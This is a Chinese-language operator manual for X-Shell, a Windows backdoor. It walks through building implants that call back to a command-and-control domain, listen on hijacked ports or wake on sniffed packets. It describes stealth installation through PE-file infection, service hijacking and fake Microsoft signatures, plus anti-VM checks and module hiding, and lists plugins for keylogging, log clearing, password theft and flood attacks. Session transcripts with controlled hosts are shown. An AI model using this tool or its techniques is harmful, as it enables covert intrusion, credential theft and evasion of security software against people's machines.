【软件概述 X-Shell 339】
【Xtiger QQ:67702497】 【http://www.xdoors.net】
1. X-Shell是Windows平台下基于纯命令行的后门程序,实现了命令行下对多台主机的远程集中管理控制。
可支持2k/xp/2003/vista/7多个Windows平台。特定的安装方式可同时兼容32位和64位系统。
2. 具有正向监听(支持Win2k/XP/2003/Vista/2008/7,如果是端口复用仅支持Win2k/XP下复用非系统端口)、
Raw Socket Sniff(仅支持Win2k/2003)、反向连接(支持Win2k/XP/2003/Vista/2008/7)3种工作模式。
3. 具有穿透防火墙、无启动项、无进程、无模块、过主动防御系统、会话数据加密且变化等关键特征。
4. 具有感染PE文件的IAT表、创建新的由svchost.exe加载的标准微软服务、替换原有服务、ActiveX等多种
手动或自动智能的安装方式,以达到在日益严酷的不同的安装环境下实现成功安装。你可以根据需要和
安装环境选择其中的对应一种安装方式或多种组合安装方式进行安装。在Win2k/xp/2003/Vista/2008/7
OS上均测试安装通过,不同操作系统和支持的安装方式不尽相同。32位和64位操作系统支持的安装方式也不同。
5. 独特的服务启动功能,服务启动后,将重新停止该服务。但并不影响被控端的运行和工作。
同时将根据客户的行为相应在需要的时候修改该服务的启动类型为非自动方式。并记录管理员
对该服务的修改行为,显示出最"正常"的服务状态和启动类型。大大提高生存能力和隐蔽性。
6. 生成的被控端(客户端)是无壳的。
7. 所有的操作都集合在一个程序里完成,X-shell在不同的工作模式下,既充当服务端,也充当客户端。
8. 中文+英文的菜单和运行说明,用户可以自行设置语言环境,进一步方便使用。
9. 高度智能的Shell,在cmd.exe被安全软件禁用时,自动随机生成另外一个文件名作为CMDSHELL的EXE路径
来执行解析CMD命令。在cmd.exe被系统ACL禁止访问时,自动修改cmd.exe的ACL使之能正常执行,并在使用
后恢复ACL。高度保证了Shell的可用性。
10. 支持插件功能,以实现更多更强大的功能。并开放第三方插件接口命令->'myplug',方便使用者自行开发插件。
11. 支持对在线主机进行显示过滤,或按主机资源情况进行的高级过滤,大大方便定位特定计算机。
12. 本说明以功能完整版本进行功能描述和使用说明,免费版本不包含其中部分功能。特此说明,不再累述。
13. 献给所有那些如同我一样依然喜欢命令行的使用者们。使用软件前,请花点时间认真阅读本说明。
【提前须知】
1.X-Shell输出4种颜色:
白色->控制端用户输入的颜色
黄色->控制端主菜单的输出的颜色
绿色->被控端返回给控制端的输出的颜色
红色->一些关键的出错输出的颜色
2.命令行的一些参数括号意义:
<>->尖括号,代表这个参数是必须输入的。
[]->方括号,代表这个参数是可选的,不是必须输入的。
3.控制端、被控端、服务端、客户端的不同意义
控制端->就是你自己啦,运行了X-Shell的主机。
被控端->就是被你控制的主机了,运行了由X-Shell生成的被控端的机器。
服务端->按照C/S网络编程模型,如果你使用了正向监听模式,被控端==服务端。 如果你使用了反向连接模式,控制端==服务端。
客户端->按照C/S网络编程模型,如果你使用了正向监听模式,控制端==客户端。 如果你使用了反向连接模式,被控端==客户端。
如果你已近晕了,那么还是忘了客户端和服务端的说法吧,只记住和理解控制端和被控端这两个概念吧。
下面的描述和说明也以控制端和被控端这两个概念进行使用说明和功能描述。
4.X-Shell支持的命令
内置命令
svc Service Control->服务控制命令 支持'-list -start -stop -view -install'操作
pslist Process List->列出进程信息 支持'pslist iex' 形式
pskill Process Kill->杀死进程 支持支持PID、进程名两种方式,如'pskill pid'和'pskill iex'
shell Enter CMD Shell->进入操作系统的cmd.exe Shell。如果没有任何操作,CMD Shell 120秒后超时退出。
reboot reboot Machine->重启计算机
shutdown Shutdown Machine->关闭计算机
filetime Change File Time->修改文件时间 支持自定义文件时间和从另外一个文件获取时间两种方式
uninstall Uninstall Client->卸载被控端
mlist Process Module List->获取特定PID进程的模块信息
idle Get System Idle Time->获取被控端鼠标键盘空闲时间
uptime Get System UP Time->获取被控端运行时间
update Update Module From URL->从一个URL进行升级
urlh Open One URL In Hiden Show->隐藏打开一个URL
urln Open One URL In Normal Show->正常打开一个URL
exeh Execute A Program In Hiden Show->隐藏显示执行一个程序
exen Execute A Program In Normal Show->正常显示执行一个程序
zip Compress File Or Dirctory to Cab File->压缩一个文件或文件夹
mhost Get Current Control Host Information->列出当前的控制端主机IP地址和端口信息。
fputs Upload File To Control Host->上传文件到控制端
fgets Download File From Control Host Or->从控制端或一个URL下载文件到被控端,支持下载后直接执行该文件。
-h 为隐藏模式,-n 为正常模式,如'fgets http://www.abc.com/abc.exe -h'
inject Inject this Module To Other Process (Default:
IEXPLORE.EXE)->插入模块到其他进程,默认插入IE进程。支持PID、进程名两种方式。
pei Infect PE File->感染PE文件
per Repair PE File->修复PE文件
插件命令
devcon Device Control <PLUG> ->设备管理
keylog Key Log Control <PLUG> ->键盘记录
cleanl Clean Event Log <PLUG> ->日志清除
display Display Control <PLUG> ->显示控制
proxy HTTP Proxy Control <PLUG> ->HTTP代理服务
sock5 Sock5 Proxy Control <PLUG> ->SOCK5代理服务
tcpagent TCP Port Transmit Agent <PLUG> ->TCP端口转发
clipboard Clipboard Control <PLUG> ->剪贴板控制
tcplist TCP Connection List <PLUG> ->TCP 连接显示
tcpkill TCP Connection Kill <PLUG> ->TCP 连接终止
sysinfo Get Systerm Information <PLUG> ->系统信息
spi List System SPI Information <PLUG> ->SPI层信息
cdrom CD-ROM Open Or Close Control <PLUG> ->光驱控制
sens Acquest Sensitive Information <PLUG> ->敏感信息提取
rebind Rebind TCP Port To Get Password <PLUG> ->TCP端口复用截取敏感信息
fport Port Infoamtion With Process Path <PLUG> ->进程和端口关联
user User List|Dele|Add|never|clone|check clone| Control <PLUG>
->用户控制命令,支持克隆和克隆检查
flood SYN|DRDOS|UDP|ICMP|IGMP|SMURF Flood(For Win2k/2K3) <PLUG> ->洪水攻击
term Terminal Services viewport|setport|start(install)|stop <PLUG> ->终端管理设置
findpass Try To Find win nt/2k/2003 Current Login User Password <PLUG>
->NT/2K/2003(SP0)查看登陆密码
myplug The Plug Write by YourSelf :) ->第三方插件接口命令
第三方插件,固定使用x_other.dll作为文件名;固定使用'myplug'为该接口命令;固定导出以下函数作为插件入口:
extern "C" __declspec (dllexport) int Plug_Other_Main(SOCKET wsh,char *cmd,int
enmagic)
更多的编写规范,请查看插件编写范例代码。
【使用帮助】
1.第一次运行:
第一次运行X-Shell,将出现双语要求配置的如下提示:
First Run This Programe,You Must Set Some Option Right Now.
(第一次运行该程序,你必须先设置以下一些基本参数)
Listen Port (监听端口):
X-Shell默认工作在反向连接模式下,X-Shell将作为监听的控制端(服务端)启动。
必须完成相关的控制端(服务端)的监听端口、连接密码、声音提示的设置,如下:
Listen Port (监听端口): 8888
Set Password [y/n]? (是否设置连接密码?): n
Sound Notify [y/n]? (是否打开声音提示?): y
ReOnline Filter [y/n]? (是否过滤重复上线?): y
Choice Language [0-EN 1-CN] (语言选择 0-英文 1-中文): 1
配置完成以后,X-Shell将监听在这个端口上,开始等待被控端的连接。如下:
【监听端口】: 8888
【连接密码】:
【声音提示】: 启用
【重复过滤】: 启用
Main#
2.主菜单介绍:
直接按回车后,将出现如下主菜单(以英文菜单为例):
X-Shell Main Contrl Command Help:
n Create A New Client.
s Show Configure Options.
c Configure Main Options.
i Get Internet Ip Address Of This Computer.
u [Url] Check Control Url Then Get Contrl's Host Information.
f [new] Set New Contrl's Host Information By FTP Protocol.
l [Filter] List Connected Host Information By Filter.
b [Filter] BroadCast Command To Connected Host By Filter.
h <Number> Enter Control Special Host Mode By Host's Number.
L List Special Host By Process or Software or IdleTime
q Quit Main Contrl Menu, Exit The Program.
a About Program.
v Check Program New Version.
! Enter/Leave Local Cmd Shell.
t <ip> <port> Telnet To Listening BackDoor On Port.
t <ip> <port> <port2> Active Sniffing BackDoor To Listen On Port2.
t <ip> <port> <ip2> <port2> Active Sniffing BackDoor To Connect To Ip2:Port2
说明如下:
n->生成一个新的被控端(客户端)
s->显示控制端主要运行参数
c->重新配置控制端运行参数
i->得到当前主机的Internet的IP地址
u->获取特定控制URL里的地址和端口信息。第一次运行,输入'u'后,将提示输入该URL。下一次使用只需要输入一个'u'字母即可。
如果你需要更改这个URL,可以通过'u url'来修改。如'u http://www.abc.com/new.asp'
f->通过FTP协议,刷新新的控制端地址和端口信息到特定URL的页面内容。第一次运行,输入'f'后,将提示输入相关FTP的URL、用户名、
密码等参数信息。下一次使用只需要输入一个'f'字母即可。如果需要更改这些参数,需要输入'f new',则重新设置FTP刷新参数。
l->列出当前已经上线的主机,可以根据需要加入过滤条件。如:'l winxp' 将列出所有的WinXP主机 'l all'将列出在先主机详细信息。
b->对已经上线的主机进行命令广播,可以根据需要加入过滤条件,如:'b 美国' 将向所有的美国主机广播特定的命令。
h->使用l命令列出在线主机的时候,每个在线主机都有一个主机ID,通过'h ID'可以进入控制该主机的工作模式。如: 'h 1800'
L->通过设定进程名、软件名、空闲时间筛选出符合条件的在线主机
q->退出程序
a->关于程序
v->检查最新版本情况
!->X-Shell控制端有时候需要进入本地的CMD Shell进行一些操作(如ipconfig,dir...),可用该命令在本地CMD
Shell和主菜单间切换。
t <ip> <port> 远程登陆连接处于正向监听模式的被控端。
t <ip> <port> <port2> 远程连接处于Sniff模式的被控端的某个开放端口,通过特定的数据包,
告诉被控端把Shell的连接端口监听在Port2上。
t <ip> <port> <ip2> <port2> 远程连接处于Sniff模式的被控端的某个开放端口,通过特定的数据包,
告诉被控端主动连接ip2主机的port2端口,以接受该主机的远程管理。
3.通过FTP刷新控制URL(内容已作修改,仅演示如何使用)
第一次使用'f'命令,需要配置基本的FTP刷新参数,将出现如下:
Main#f
Please Input FTP URL : http://www.abc.com/xcip.asp
Please Input FTP USER: abc
Please Input FTP PASS: abc123
Listing Your Intranet And Inetnet Ip. Please Wait....
1. 0.0.0.0
2. 192.168.0.175
3. 108.166.159.3
Choose One Above Ip Or Input Control Host By Yourself : 2
Please Input Control Port [1-65535] :
Please Chioce Refresh AI Mode [1.Normal 2.Half 3.All] :
Refreshing New Control Host Information,Please Wait...
Ok,New Control host Information Refesh to 'ftp://www.abc.com/xcip.asp'
下一次使用'f'命令,将直接进入选择IP或自己填入控制主机地址的环节,如下:
Main#f
Listing Your Intranet And Inetnet Ip. Please Wait....
1. 0.0.0.0
2. 192.168.0.175
3. 108.166.159.3
Choose One Above Ip Or Input Control Host By Yourself : 2
Please Input Control Port [1-65535] :
Please Chioce Refresh AI Mode [1.Normal 2.Half 3.All] :
Refreshing New Control Host Information,Please Wait...
Ok,New Control host Information Refesh to 'ftp://www.abc.com/xcip.asp'
如果需要重新设置FTP刷新参数,输入'f new',将重新配置FTP的刷新参数,如下:
Main#f new
Please Input Contrl URL :
...
4.生成一个新的被控端
在主控菜单下输入字母n后,将出现生成被控端向导。如下:
1. Connect Mode
2. Listen Mode
3. Sniffer Mode
Please Choose One Of Above Work Mode :
X-Shell支持反向连接(支持Win2k/XP/2003/Vista/2008/7)、正向监听(仅支持Win2k/XP下复用非系统端口)、Sniff(仅支持Win2k/2003)3种工作模式。
只能选择其中的一种工作模式作为被控端的工作模式。支持生成DLL或EXE的被控端两种方式,如果选择生成EXE被控端,必须设定安装方式和相关的的安装参数。
不管是DLL还是EXE被控端,最终都是通过RUNDLL32.EXE调用DLL本身内封装的不同的安装函数实现安装。
典型的反向连接EXE被控端生成过程:
Main#n
1. Connect Mode
2. Listen Mode
3. Sniffer Mode
Please Choose One Of Above Work Mode : 1
Do You Want To Set Current Password With Client [y/n]?: n
Please Input Static Contrl Host [Ip|Domain Name]: xlineinfo.3322.org
Please Input Static Contrl Port [1-65535]: 8888
Please Input Interval Sec Of Connect To Host [30-3600]:
Do You Want To Notify Client Actively By URL [y/n]?: y
Please Input The Control URL : http://www.abc.com/xcip.asp
Please Input Interval Sec Of Connect To URL [30-3600]:
Connect Control Host By Socks5 Proxy Server [y/n]?: n
Online With Agent's Proxy Settings Automatically[y/n]?: n
Do You Want To Set Client Symbol By YourSelf [y/n]?: n
Do You Want To Set Group Symbol By YourSelf [y/n]?: n
Do You Want To Set Version Symbol By YourSelf [y/n]?: n
Do You Want To Close Install Log To File [y/n]?: n
Skip Installtion If Detect Virtual Machine [y/n]?: n
Try Recover SSDT Before Install (Ring 3) [y/n]?: n
Try Recover SSDT Before Install (Ring 0) [y/n]?: n
Do You Want To Active Anti Mode [y/n]?: y
Do You Want To Hide Module From Process [y/n]?: y
Do You Want To Create An Exe Client Programe [y/n]?: y
1. Install New Services
2. Replace Old Services
3. Infect PE File
4. Random Install No Install Services
5. Random Replace No Runing Old Services
6. Auto Infect PE File By Detect OS
7. Commom Install Way
8. ActiveX Install Way
9. Inject Module To Exe(For Test)
Please Choose One Of Above Title As Install Ways : 1
Please Input New Services Name For Install : IPRIP
Please Input Destription Of New Services : IPRIP Service
Do You Want To Delete Self After Install [y/n]?: y
Do You Want To Set Module FileTime As Master's [y/n]?: y
Auto 'Run As Administrator' On Vista And Above [y/n]?: y
[Work Mode ]: Connect Mode
[Control Host ]: xlineinfo.3322.org
[Control Port ]: 8888
[Set Client With PassWord ]: No
[Interval Sec Of Reconnect Contrl Host]: 30 Sec
[Control URL ]: http://www.abc.com/xcip.asp
[Interval Sec Of Reconnect Contrl URL ]: 30 Sec
[Socks5 Proxy Server Adress ]:
[Socks5 Proxy Server Port ]:
[Socks5 Proxy Server User ]:
[Socks5 Proxy Server Pass ]:
[Find Proxy Information Automatically ]: NO
[Client Symbol ]: Default ComputerName
[Group Symbol ]: Default GroupName
[Version Symbol ]: Default Version
[Log Install Information To File ]: Yes
[Skip Installtion In Virtual Machine ]: No
[Recover SSDT Before Install(Ring3) ]: No
[Anit HIPS Install Mode ]: YES
[Anit HIPS Install Mode ]: YES
[Hide Self Mode From Process ]: Yes
[Add Digital Sign To Agent File ]: NO
[Install Ways ]: InstallSA
[New Services Name ]: IPRIP
[New Services Description ]: IPRIP Service
[Delete Self After Install ]: Yes
[Set Module FileTime As Master's ]: Yes
[Auto Try 'Run As Administrator' ]: Yes
All of Above Information Of New Client Correct [y/n]?: y
Please Input EXE Client File Name : testexe1
'testexe1.exe' Client Program Create + Add Digital Sing Sucessfully
反向连接工作模式被控端说明如下:
反向连接支持固定的IP或域名与URL空间两种上线方式。条件具备的情况下,建议采用后者,可以和主菜单的'f'命令配合实现动态控制。
支持以当前控制端的连接密码配置到被控端中作为连接时的密码验证,也可以通过SOCKS5代理服务器或自动收集主机代理信息连接控制端,增强安全性。
支持设定被控端重连控制端的时间间隔、被控端重连URL获取控制端地址信息的间隔时间的设置,增强安全性。
支持生成时添加虚假的微软数字证书的功能,以通过一些特定安全软件的拦截,并增强后期的迷惑性。
支持安装时手动设置主机的标识,是否记录安装日子到文件,检测是否为虚拟机系统,以及恢复SSDT表,对抗安装,隐藏自己的模块等高级安装选项。
如果生成的是EXE客户端,还支持运行后是否自动删除自己,和把释放出来的模块的文件时间修改为宿主进程,和VISTA/WIN7直接尝试以管理员运行这三个选项。
典型的正向监听EXE被控端生成过程:
Main#n
1. Connect Mode
2. Listen Mode
3. Sniffer Mode
Please Choose One Of Above Work Mode : 2
Please Input Listen Port [1-65535]: 23
Please Input Listen PassWord : 12345678
Do You Want To Set Client Symbol By YourSelf [y/n]?: n
Do You Want To Set Group Symbol By YourSelf [y/n]?: n
Do You Want To Set Version Symbol By YourSelf [y/n]?: n
Do You Want To Close Install Log To File [y/n]?: n
Skip Installtion If Detect Virtual Machine [y/n]?: n
Try Recover SSDT Before Install (Ring 3) [y/n]?: n
Try Recover SSDT Before Install (Ring 0) [y/n]?: n
Do You Want To Active Anti Mode [y/n]?: y
Do You Want To Hide Module From Process [y/n]?: y
Do You Want To Add Digtal Sing To PE File [y/n]?: y
Do You Want To Create An Exe Client Programe [y/n]?: y
1. Install New Services
2. Replace Old Services
3. Infect PE File
4. Random Install No Install Services
5. Random Replace No Runing Old Services
6. Auto Infect PE File By Detect OS
7. Commom Install Way
8. ActiveX Install Way
9. Inject Module To Exe(For Test)
Please Choose One Of Above Title As Install Ways : 5
Do You Want To Delete Self After Install [y/n]?: y
Do You Want To Set Module FileTime As Master's [y/n]?: y
Auto 'Run As Administrator' On Vista And Above [y/n]?: y
[Work Mode ]: Listen Mode
[Listen Port ]: 23
[Listen Pass ]: 12345678
[Client Symbol ]: Default ComputerName
[Group Symbol ]: Default GroupName
[Version Symbol ]: Default Version
[Log Install Information To File ]: Yes
[Skip Installtion In Virtual Machine ]: No
[Recover SSDT Before Install(Ring3) ]: No
[Anit HIPS Install Mode ]: YES
[Anit HIPS Install Mode ]: YES
[Hide Self Mode From Process ]: Yes
[Add Digital Sign To Agent File ]: YES
[Install Ways ]: InstallRSB
[Replace Services Name ]: Random of No Running Services
[Delete Self After Install ]: Yes
[Set Module FileTime As Master's ]: Yes
[Auto Try 'Run As Administrator' ]: Yes
All of Above Information Of New Client Correct [y/n]?: y
Please Input EXE Client File Name : testexe2
'testexe2.exe' Client Program Create + Add Digital Sing Sucessfully
正向连接工作模式被控端说明如下:
支持手动配置被控端中的连接密码,连接时必须提供正确的密码才能进入,增强安全性。
支持端口复用,在RING3级别实现了对Win2k/xp的非系统端口的SOCKET复用。建议复用传统的一对一的服务端口,如23,25,80,110等。
在控制端主菜单中使用't <ip> <port>'命令,连接处于正向监听的工作模式的被控端。如't 101.111.111.111 80'
其他说明同上。
典型的Sniff被控端生成过程:
Main#n
1. Connect Mode
2. Listen Mode
3. Sniffer Mode
Please Choose One Of Above Work Mode : 3
Connect Control Host By Socks5 Proxy Server [y/n]?: n
Online With Agent's Proxy Settings Automatically[y/n]?: n
Do You Want To Set Client Symbol By YourSelf [y/n]?: n
Do You Want To Set Group Symbol By YourSelf [y/n]?: n
Do You Want To Set Version Symbol By YourSelf [y/n]?: n
Do You Want To Close Install Log To File [y/n]?: n
Skip Installtion If Detect Virtual Machine [y/n]?: n
Try Recover SSDT Before Install (Ring 3) [y/n]?: n
Try Recover SSDT Before Install (Ring 0) [y/n]?: n
Do You Want To Active Anti Mode [y/n]?: n
Do You Want To Hide Module From Process [y/n]?: y
Do You Want To Add Digtal Sing To PE File [y/n]?: y
Do You Want To Create An Exe Client Programe [y/n]?: y
1. Install New Services
2. Replace Old Services
3. Infect PE File
4. Random Install No Install Services
5. Random Replace No Runing Old Services
6. Auto Infect PE File By Detect OS
7. Commom Install Way
8. ActiveX Install Way
9. Inject Module To Exe(For Test)
Please Choose One Of Above Title As Install Ways : 6
1. NorMal Mode->Infect EXE Then Inject Module To Master Process
2. Quiet Mode->Infect EXE Then Do Nothing
3. Reboot Mode->Infect EXE Then Reboot Machine
Please Choose One Of Above Install Mode After Infect : 1
Do You Want To Delete Self After Install [y/n]?: y
Do You Want To Set Module FileTime As Master's [y/n]?: y
Auto 'Run As Administrator' On Vista And Above [y/n]?: y
[Work Mode ]: Sniff Mode
[Socks5 Proxy Server Adress ]:
[Socks5 Proxy Server Port ]:
[Socks5 Proxy Server User ]:
[Socks5 Proxy Server Pass ]:
[Find Proxy Information Automatically ]: NO
[Client Symbol ]: Default ComputerName
[Group Symbol ]: Default GroupName
[Version Symbol ]: Default Version
[Log Install Information To File ]: Yes
[Skip Installtion In Virtual Machine ]: No
[Recover SSDT Before Install(Ring3) ]: No
[Anit HIPS Install Mode ]: NO
[Anit HIPS Install Mode ]: NO
[Hide Self Mode From Process ]: Yes
[Add Digital Sign To Agent File ]: YES
[Install Ways ]: InstallSPE
[Infect PE FileName ]: Auto Choice One Running PE File To Infect By judge OS
[Installtion Mode After Infect ]: normal
[Delete Self After Install ]: Yes
[Set Module FileTime As Master's ]: Yes
[Auto Try 'Run As Administrator' ]: Yes
All of Above Information Of New Client Correct [y/n]?: y
Please Input EXE Client File Name : testexe3
Error,InstallPE Or InstallSPE Install Mode,Length Of FileName Must <= 6
Please Input EXE Client File Name : t3
't3.exe' Client Program Create + Add Digital Sing Sucessfully
SNIFF工作模式被控端说明如下:
SNIFF工作模式下,可以根据不同需要让被控端接收到特定数据包后监听某个端口等待控制端连接管理控制或主动连接控制端接受管理控制。
在控制端主菜单中使用't <ip> <port> <port2>'命令,连接处于SNIFF的工作模式的被控端的某个正常开放端口,通过特殊的数据包来告诉
被控端其把SHELL监听在端口port2上,然后在主菜单下,使用't <ip> <port>'命令连接到Shell的监听端口上。进行远程控制管理。
如: 't 101.111.111.111 25 80'; 再使用命令连接't 101.111.111.111 80'
在控制端主菜单中使用't <ip> <port> <ip2> <port2>'命令,连接处于SNIFF的工作模式的被控端的某个正常开放端口,通过特殊的数据包
告诉被控端主动连接ip2的port2端口,以接受ip2的远程控制管理。如: 't 101.111.111.111 25 x.x.x.x 80'. 其中x.x.x.x为当前
控制端的IP地址。也可以通过SOCKS5代理服务器或自动收集主机代理信息连接控制端,增强安全性。
对于多网卡的主机系统,请慎重使用Sniff工作模式,因为默认Sniff模式下只监听第一块网卡的数据包并作分析。
5.不同工作模式的连接演示
反向连接模式:
当安装完被控端后,被控端通过URL或域名方式在取得控制端地址信息后,被控端将主动连接处于监听状态的控制端。
在控制端的主控制菜单里,通过l命令,可以发现已经上线的主机基本信息,通过h命令,进入控制某个具体被控端。
"l"命令将显示已经上线主机的基本信息,分别是IP地址:端口 主机标识 操作系统 版本标识 连接速度
如下:
Main#l
432 10.4.8.177:50723 |WZG-PC |Win 7 Ultimate (build 7600) |U339 |1 ms
752 10.4.8.198:3860 |X-VMSRV |Win Server 2003 Enterprise SP2 (build 3790) |U339
|1 ms
700 10.4.8.156:4079 |XP_360_360SD |Win XP Professional SP2 (build 2600) |U339 |1
ms
684 10.4.8.155:1503 |TEST-2K |Win 2000 Server SP4 (build 2195) |U339 |1 ms
Total Found 4 Host Online With Filter ''.
"l all"命令将显示已经上线主机的详细信息,
分别是IP地址:端口 主机标识 操作系统 版本标识 连接速度 硬件信息 组标识 地理位置 宿主进程
如下:
Main#l all
432 10.4.8.177:50723 |WZG-PC |Win 7 Ultimate (build 7600) |U339 |1 ms
2.2G*1 1024M 16M 17G |default |局域网 对方和您在同一内部网 |svchost.exe
700 10.4.8.156:4079 |XP_360_360SD |Win XP Professional SP2 (build 2600) |U339 |1
ms
2.6G*1 299M 16M 21G |default |局域网 对方和您在同一内部网 |svchost.exe
684 10.4.8.155:1503 |TEST-2K |Win 2000 Server SP4 (build 2195) |U339 |1 ms
2.6G*1 255M 16M 4G |default |局域网 对方和您在同一内部网 |svchost.exe
656 10.4.8.198:3869 |X-VMSRV |Win Server 2003 Enterprise SP2 (build 3790) |U339
|17 ms
2.6G*2 2038M 128M 160G |default |局域网 对方和您在同一内部网 |rundll32.exe
Total Found 4 Host Online With Filter ''.
"l 过滤条件",将列出符合过滤条件的主机详细信息。
如下:
Main#l xp
700 10.4.8.156:4079 |XP_360_360SD |Win XP Professional SP2 (build 2600) |U339 |1
ms
2.6G*1 299M 16M 21G |default |局域网 对方和您在同一内部网 |svchost.exe
Total Found 1 Host Online With Filter 'xp'.
通过"h"命令,进入某台主机的具体控制状态。
Main#h 700
Ok,Set Current Slave Host To Be->[10.4.8.156:4079 ] [XP_360_360SD ]
[XP_360_360SD]#
Hi,Master [2010/4/2 17:27:55]
WelCome Back...Are You Enjoying Today?
Machine UpTime [00 Days 07 Hours 10 Minutes 47 Seconds]
Machine IdleTime [00 Days 00 Hours 56 Minutes 42 Seconds]
Encrypt Magic Number For This Remote Shell Session [0x17]
[XP_360_360SD]#
<'?' for help>
[XP_360_360SD]#
正向监听模式:
当安装完被控端后,被控端将直接监听在某个端口上。如果监听的端口已经被使用,
且被控端是2K/XP系统,将尝试进行端口复用。只有通过X-Shell控制端才能激活并连接。如下:
Main#t 10.11.5.177 23
Connecting to 10.11.5.177:23...
Sending Sepcical Packet to Entering BackDoor...
Password: ******
Hi,Master [2008/4/22 15:17:48]
WelCome Back...Are You Enjoy Today?
Machine UpTime [00 Days 00 Hours 06 Minutes 26 Seconds]
Machine IdleTime [00 Days 00 Hours 04 Minutes 44 Seconds]
Encrypt Magic Number For This Remote Shell Session [0x04]
[TEST-2K]#
<'?' for help>
[TEST-2K]#
被控端上正常的TELNET连接将不影响使用。如下:
telnet 10.11.5.177
Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99206.1
login:
在此模式下,如果没有键入任何命令的时间超过120秒,被控端将主动结束连接,脱离控制。如下:
Socket Error...This Session Close.Type 'Ctrl+C' To Exit
Sniff模式:
当安装完被控端后,被控端将使用RAW SOCKET捕获发往本机的TCP数据包并分析。当分析出
由X-Shell发出的特别的激活数据包后,根据数据包的设置,被控端将做出两种连接选择。
第一种:监听在某个端口上,等待控制端的远程连接控制。如果是2K/XP系统,支持非系统端口复用。
如下:在控制端使用't <ip> <port> <port2>'命令,连接被控端10.11.5.177的开放端口80,
告诉其把Shell的监听在端口23上,然后即可通过't 10.11.5.177 23'的命令来远程连接Shell了。如下:
Main#t 10.11.5.177 80 23
Connecting to 10.11.5.177:80...
Sending Sepcical Packet To Active BackDoor Listen On Port 23...
Active Finished,Type 't 10.11.5.177 23' On Main Command to Get Shell
Main#t 10.11.5.177 23
Connecting to 10.11.5.177:23...
Sending Sepcical Packet to Entering BackDoor...
Hi,Master [2008/4/23 17:17:9]
WelCome Back...Are You Enjoy Today?
Machine UpTime [00 Days 02 Hours 27 Minutes 35 Seconds]
Machine IdleTime [00 Days 00 Hours 04 Minutes 54 Seconds]
Encrypt Magic Number For This Remote Shell Session [0x01]
[TEST-2K]#
<'?' for help>
[TEST-2K]#
第二种:主动连接控制端,接受远程连接控制。
如下:在控制端使用't <ip> <port> <ip2> <port2>'命令,连接被控端10.11.5.177的开放端口80,
告诉其主动连接控制端,在控制端,可以通过'l'命令查看到其连接上来了,在通过'h'命令进入远程管理控制。如下:
Main#t 10.11.5.177 80 10.11.11.175 8888
Connecting to 10.11.5.177:80...
Sending Sepcical Packet To Active BackDoor Connect To Host 10.11.11.175:8888...
Active Finished,Will Give You Shell On Control Host 10.11.11.175:8888
Main#l
416 10.11.5.177:1085 |TEST-2K |Win 2000 Server SP4 (build 2195) |U339 |1 ms
Total Found 1 Host Online With Filter ''.
Main#h 416
Ok,Set Current Slave Host To Be->[10.11.5.177:1085 ] [TEST-2K ]
Hi,Master [2008/4/23 17:20:0]
WelCome Back...Are You Enjoy Today?
Machine UpTime [00 Days 02 Hours 30 Minutes 25 Seconds]
Machine IdleTime [00 Days 00 Hours 07 Minutes 45 Seconds]
Encrypt Magic Number For This Remote Shell Session [0x13]
[TEST-2K]#
5.安装与卸载:
X-Shell的安装和卸载方式和X-Door基本一样.可以参看以下两个链接里的内容,以获取安装卸载方面的帮助:
http://www.xdoors.net/help/安装设置/安装与卸载.htm
http://www.xdoors.net/help/安装设置/安装实例.htm
【关于软件】
1.X-shell软件的版权归作者所有。
2.请谨慎、合法、明智地使用本软件。不要破坏他人计算机数据。
3.由使用本软件带来的法律纠纷,请自己负责。作者概不负责。
4.如果你无法接受以上声明,请不要使用本软件。
程序经过了大量的实际环境测试,但可能仍存在未知的BUG。
欢迎告之,不胜感激!
提供有偿软件定制开发和后期维护服务,如果你有好的开发建议
和项目合作意向,也欢迎联系作者。希望认识更多志同道合的朋友!
欢迎访问 http://www.xdoors.net 这里将不定期更新些安全工具。
希望能给大家带来更多的惊喜!
All By Xtiger
QQ : 67702497
WEB : http://www.xdoors.net
MAIL: crackersoftware@163.com